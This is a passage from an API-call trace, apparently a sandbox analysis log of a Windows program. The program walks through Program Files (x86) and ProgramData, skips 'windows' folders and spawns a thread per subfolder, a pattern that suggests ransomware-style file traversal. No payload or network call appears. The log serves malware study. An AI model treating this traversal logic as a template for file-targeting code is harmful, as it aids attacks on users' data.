(x86)\\Microsoft Visual Studio 8", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\*.*" [0038.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cc0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.660] CloseHandle (hObject=0x1b8) returned 1 [0038.660] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0038.660] lstrcmpW (lpString1=".", lpString2="Microsoft.NET") returned -1 [0038.660] lstrcmpW (lpString1="..", lpString2="Microsoft.NET") returned -1 [0038.660] lstrcmpiW (lpString1="windows", lpString2="Microsoft.NET") returned 1 [0038.662] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.662] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Microsoft.NET" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET" [0038.662] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\*.*" [0038.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d205f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.667] CloseHandle (hObject=0x1b8) returned 1 [0038.667] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0038.667] lstrcmpW (lpString1=".", lpString2="Mozilla Firefox") returned -1 [0038.667] lstrcmpW (lpString1="..", lpString2="Mozilla Firefox") returned -1 [0038.667] lstrcmpiW (lpString1="windows", lpString2="Mozilla Firefox") returned 1 [0038.668] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.668] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Mozilla Firefox" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox" [0038.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\*.*" [0038.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d506c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.671] CloseHandle (hObject=0x1b8) returned 1 [0038.672] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb08409c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb08409c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0038.672] lstrcmpW (lpString1=".", lpString2="Mozilla Maintenance Service") returned -1 [0038.672] lstrcmpW (lpString1="..", lpString2="Mozilla Maintenance Service") returned -1 [0038.672] lstrcmpiW (lpString1="windows", lpString2="Mozilla Maintenance Service") returned 1 [0038.673] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.673] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Mozilla Maintenance Service" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service" [0038.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0038.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d80798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.758] CloseHandle (hObject=0x1b8) returned 1 [0038.758] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553ced90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0038.758] lstrcmpW (lpString1=".", lpString2="MSBuild") returned -1 [0038.758] lstrcmpW (lpString1="..", lpString2="MSBuild") returned -1 [0038.758] lstrcmpiW (lpString1="windows", lpString2="MSBuild") returned 1 [0038.758] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.758] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.758] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="MSBuild" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild" [0038.758] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" [0038.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x3380118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.759] CloseHandle (hObject=0x1b8) returned 1 [0038.759] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0038.759] lstrcmpW (lpString1=".", lpString2="Reference Assemblies") returned -1 [0038.759] lstrcmpW (lpString1="..", lpString2="Reference Assemblies") returned -1 [0038.759] lstrcmpiW (lpString1="windows", lpString2="Reference Assemblies") returned 1 [0038.760] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.760] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Reference Assemblies" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies" [0038.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" [0038.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9358180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.761] CloseHandle (hObject=0x1b8) returned 1 [0038.761] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0038.761] lstrcmpW (lpString1=".", lpString2="Uninstall Information") returned -1 [0038.761] lstrcmpW (lpString1="..", lpString2="Uninstall Information") returned -1 [0038.761] lstrcmpiW (lpString1="windows", lpString2="Uninstall Information") returned 1 [0038.762] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.763] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Uninstall Information" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information" [0038.763] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*" [0038.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93701e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.763] CloseHandle (hObject=0x1b8) returned 1 [0038.763] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0038.764] lstrcmpW (lpString1=".", lpString2="Windows Defender") returned -1 [0038.764] lstrcmpW (lpString1="..", lpString2="Windows Defender") returned -1 [0038.764] lstrcmpiW (lpString1="windows", lpString2="Windows Defender") returned -1 [0038.765] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.765] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Defender" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender" [0038.765] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Defender\\*.*" [0038.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9388250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.766] CloseHandle (hObject=0x1b8) returned 1 [0038.766] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0038.766] lstrcmpW (lpString1=".", lpString2="Windows Mail") returned -1 [0038.766] lstrcmpW (lpString1="..", lpString2="Windows Mail") returned -1 [0038.766] lstrcmpiW (lpString1="windows", lpString2="Windows Mail") returned -1 [0038.767] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.767] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Mail" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail" [0038.767] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Mail\\*.*" [0038.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93a02b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.768] CloseHandle (hObject=0x1b8) returned 1 [0038.768] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0038.768] lstrcmpW (lpString1=".", lpString2="Windows Media Player") returned -1 [0038.768] lstrcmpW (lpString1="..", lpString2="Windows Media Player") returned -1 [0038.768] lstrcmpiW (lpString1="windows", lpString2="Windows Media Player") returned -1 [0038.770] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.770] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Media Player" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player" [0038.770] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\*.*" [0038.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93b8320, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.771] CloseHandle (hObject=0x1b8) returned 1 [0038.771] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0038.771] lstrcmpW (lpString1=".", lpString2="Windows NT") returned -1 [0038.771] lstrcmpW (lpString1="..", lpString2="Windows NT") returned -1 [0038.771] lstrcmpiW (lpString1="windows", lpString2="Windows NT") returned -1 [0038.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.772] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows NT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT" [0038.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\*.*" [0038.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93d0388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.773] CloseHandle (hObject=0x1b8) returned 1 [0038.773] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1052bf50, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1052bf50, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0038.773] lstrcmpW (lpString1=".", lpString2="Windows Photo Viewer") returned -1 [0038.773] lstrcmpW (lpString1="..", lpString2="Windows Photo Viewer") returned -1 [0038.773] lstrcmpiW (lpString1="windows", lpString2="Windows Photo Viewer") returned -1 [0038.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.775] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Photo Viewer" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer" [0038.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\*.*" [0038.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x93e83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.776] CloseHandle (hObject=0x1b8) returned 1 [0038.776] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x10362ed0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10362ed0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0038.776] lstrcmpW (lpString1=".", lpString2="Windows Portable Devices") returned -1 [0038.776] lstrcmpW (lpString1="..", lpString2="Windows Portable Devices") returned -1 [0038.776] lstrcmpiW (lpString1="windows", lpString2="Windows Portable Devices") returned -1 [0038.777] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.777] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.777] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Portable Devices" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices" [0038.777] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Portable Devices\\*.*" [0038.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9400458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.778] CloseHandle (hObject=0x1b8) returned 1 [0038.778] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0038.778] lstrcmpW (lpString1=".", lpString2="Windows Sidebar") returned -1 [0038.778] lstrcmpW (lpString1="..", lpString2="Windows Sidebar") returned -1 [0038.778] lstrcmpiW (lpString1="windows", lpString2="Windows Sidebar") returned -1 [0038.780] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\*.*" [0038.780] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\*.*") returned 30 [0038.780] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\", lpString2="Windows Sidebar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar" [0038.780] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\*.*" [0038.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94184c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b8 [0038.780] CloseHandle (hObject=0x1b8) returned 1 [0038.780] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x394fd30 | out: lpFindFileData=0x394fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0038.781] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 19 os_tid = 0xa80 [0038.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*.*", lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5430 [0038.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0038.555] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0038.555] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0038.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0038.555] FindNextFileW (in: hFindFile=0x5a5430, lpFindFileData=0x3a8fd30 | out: lpFindFileData=0x3a8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0038.556] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0038.556] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0038.556] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0038.557] lstrcatW (in: lpString1="", 